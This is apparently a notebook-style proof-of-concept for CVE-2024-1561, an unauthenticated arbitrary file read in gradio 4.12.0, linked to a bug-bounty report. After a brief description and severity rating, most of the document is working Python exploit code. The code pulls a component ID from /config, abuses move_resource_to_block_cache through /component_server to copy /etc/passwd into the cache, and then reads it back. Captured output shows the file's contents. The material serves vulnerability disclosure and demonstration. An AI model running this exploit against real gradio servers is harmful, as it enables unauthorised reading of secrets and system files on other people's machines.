# gradio 4.12.0 LFI Demo - CVE-2024-1561

Report: https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338

### Description
This is a vulnerability in the `gradio` package that allows an attacker to read arbitrary files on the system by sending a crafted HTTP request to the server.

The [`move_resource_to_block_cache()`](https://github.com/gradio-app/gradio/blob/227221f88755240798ca2071bd1a0d165f5a82e7/gradio/processing_utils.py#L228) is used to move a resource to the cache.
 

### CVE Rating
This vulnerability has been rated as a `High` severity issue because of the following factors:
  - The vulnerability allows an attacker to read arbitrary files on the system.
  - The vulnerability can be exploited remotely by sending a crafted HTTP request to the server.
  - The vulnerability can be exploited without authentication.


In [6]:
import json

import http.client
import urllib.parse

def post_request(conn, endpoint, payload, headers):
  conn.request("POST", endpoint, body=payload, headers=headers)
  response = conn.getresponse()
  response_data = response.read().decode()
  return {"status": response.status, "data": response_data}


def get_request(conn, payload):
  conn.request("GET", payload)
  response = conn.getresponse()
  response_data = response.read().decode()
  return {"status": response.status, "data": response_data}


In [7]:
  server = "127.0.0.1"
  port = 7860
  target_file = "/etc/passwd"

  component_id = ""
  cached_file_path = ""

  conn = http.client.HTTPConnection(server, port)

In this step we query the `/config` endpoint in order to extract a valid `component_id` that will be used in subsequent requests.

In [8]:
payload = f"/config"
response = get_request(conn, payload)

# Extract a valid `component_id`
component_id = json.loads(response["data"])["components"][0]["id"]

print("Setup - Retrieve application configuration")
print("Status:", response["status"])
print("Response data:", response["data"])
print(f"Component ID: {component_id}")

Setup - Retrieve application configuration
Status: 200
Response data: {"version":"4.12.0","mode":"interface","app_id":976238203326189221,"dev_mode":false,"analytics_enabled":true,"components":[{"id":3,"type":"row","props":{"variant":"default","visible":true,"equal_height":false,"name":"row"},"skip_api":true,"component_class_id":"58f59d1caa4b63161ae89f53fb1ea3e9"},{"id":4,"type":"column","props":{"scale":1,"min_width":320,"variant":"panel","visible":true,"name":"column"},"skip_api":true,"component_class_id":"73b3a7d60a2ccce94d4900e01c75247c"},{"id":5,"type":"column","props":{"scale":1,"min_width":320,"variant":"default","visible":true,"name":"column"},"skip_api":true,"component_class_id":"73b3a7d60a2ccce94d4900e01c75247c"},{"id":1,"type":"textbox","props":{"value":"","lines":1,"max_lines":20,"label":"name","show_label":true,"container":true,"min_width":160,"visible":true,"autofocus":false,"autoscroll":true,"elem_classes":[],"type":"text","rtl":false,"show_copy_button":false,"name":"text

The next step is to call the vulnerable method- `move_resource_to_block_cache()`- with a valid `component_id` and a crafted `data` path that will allow us to read arbitrary files on the system.

In [9]:
api_endpoint = "/component_server"
payload = json.dumps({
  "component_id" : component_id,
  "data" : target_file,
  "fn_name" : "move_resource_to_block_cache",
  "session_hash" : "aaaaaaaaaaa"
})
headers = {"Content-Type": "application/json"}

response = post_request(conn, api_endpoint, payload, headers)

# Extract the newly created cache path
cached_file_path = response["data"].strip('"')

print("SETUP - Move resource to block cache")
print("Status:", response["status"])
print("Response data:", response["data"])
print(f"Cached file path: {cached_file_path}")

SETUP - Move resource to block cache
Status: 200
Response data: "/tmp/gradio/2df5cd2c2d65b3af410e85b09be6493c63a189cb/passwd"
Cached file path: /tmp/gradio/2df5cd2c2d65b3af410e85b09be6493c63a189cb/passwd


Finally we read the contents of the cached file.

In [10]:
payload = f"/file={cached_file_path}"
response = get_request(conn, payload)

print("PAYLOAD - Read secrets")
print("Status:", response["status"])
print("Response data:", response["data"])

PAYLOAD - Read secrets
Status: 200
Response data: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:sy